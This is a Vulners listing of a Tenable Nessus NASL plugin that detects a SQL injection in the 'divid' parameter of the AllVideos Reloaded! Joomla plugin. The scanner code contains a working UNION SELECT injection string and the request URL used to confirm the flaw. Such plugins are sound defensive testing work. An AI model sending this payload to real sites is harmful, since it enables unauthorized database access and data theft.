Lucene search
K

AllVideos Reloaded! Plugin for Joomla! 'divid' Parameter SQLi

🗓️ 19 Jul 2011 00:00:00Reported by TenableType 
nessus
 nessus
🔗 www.tenable.com👁 35 Views

AllVideos Reloaded! Joomla Plugin SQLi Vulnerabilit

Refs
Code
SourceLink
nessuswww.nessus.org/u
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(55623);
  script_version("1.12");
  script_set_attribute(attribute:"plugin_modification_date", value:"2025/05/14");
  script_bugtraq_id(48708);

  script_name(english:"AllVideos Reloaded! Plugin for Joomla! 'divid' Parameter SQLi");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by a
SQL injection vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of the AllVideos Reloaded! plugin for Joomla! running on
the remote host is affected by a SQL injection vulnerability in the
views/popup/view.html.php script due to improper sanitization of
user-supplied input to the 'divid' parameter before using it to
construct database queries. Regardless of the PHP 'magic_quotes_gpc'
setting, an unauthenticated, remote attacker can exploit this issue to
manipulate database queries, resulting in disclosure of sensitive
information, modification of data, or other attacks against the
underlying database.");
  # http://joomlacode.org/gf/project/allvideos15/forum/?action=ForumBrowse&forum_id=7580&_forum_action=ForumMessageBrowse&thread_id=21138
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?ead52621");
  script_set_attribute(attribute:"solution", value:
"Upgrade to AllVideos Reloaded! version 1.2.7 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2011/07/17");
  script_set_attribute(attribute:"patch_publication_date", value:"2011/07/17");
  script_set_attribute(attribute:"plugin_publication_date", value:"2011/07/19");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:joomla:joomla\!");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_set_attribute(attribute:"enable_cgi_scanning", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2011-2025 Tenable Network Security, Inc.");

  script_dependencies("joomla_detect.nasl");
  script_require_keys("installed_sw/Joomla!", "www/PHP");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");

app = "Joomla!";
get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:80, php:TRUE);

install = get_single_install(
  app_name : app,
  port     : port
);
dir = install['path'];
install_url =  build_url(port:port, qs:dir);

# Verify component is installed
plugin = "AllVideos Reloaded!";

# Check KB first
installed = get_kb_item("www/"+port+"/webapp_ext/"+plugin+" under "+dir);

if (!installed)
{
  checks = make_array();
  regexes = make_list();
  regexes[0] = make_list('<name>AvReloaded<');
  checks["/administrator/components/com_avreloaded/com_avreloaded.xml"]=regexes;

  # In case /administrator is protected
  checks["/components/com_avreloaded/controller.php"][0]=make_list("undefined function jimport()");

  # Ensure plugin is installed
  installed = check_webapp_ext(
    checks : checks,
    dir    : dir,
    port   : port,
    ext    : plugin
  );

}
if (!installed) audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + " plugin");

# Try to exploit the issue to generate a SQL error.
magic1 = rand() % 100;
magic2 = SCRIPT_NAME - ".nasl";
exploit = "avreloaded0' UNION SELECT '" + magic2 + "' -- '";

url = '/index.php?option=com_avreloaded&view=popup&Itemid=' + magic1 + '&' +
  'divid=' + str_replace(find:" ", replace:"+", string:exploit);

res = http_send_recv3(
  port   : port,
  method : "GET",
  item   : dir + url,
  exit_on_fail : TRUE
);

found_str = '<!-- AVRSYS_IN_POPUP --><!-- PLG_CLIPBOARD_DISABLE -->' + magic2;
if (found_str >< res[2])
{
  output = strstr(res[2], found_str);
  if (empty_or_null(output)) output = res[2];

  security_report_v4(
    port        : port,
    severity    : SECURITY_HOLE,
    line_limit  : 5,
    sqli        : TRUE,
    generic     : TRUE,
    request     : make_list(install_url + url),
    output      : chomp(output),
    rep_extra   : '\nNote that it may be necessary to view the source of the page in order\nto see the string as the default style is a black page.'
  );
  exit(0);
}
else
  audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin + " plugin.");

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation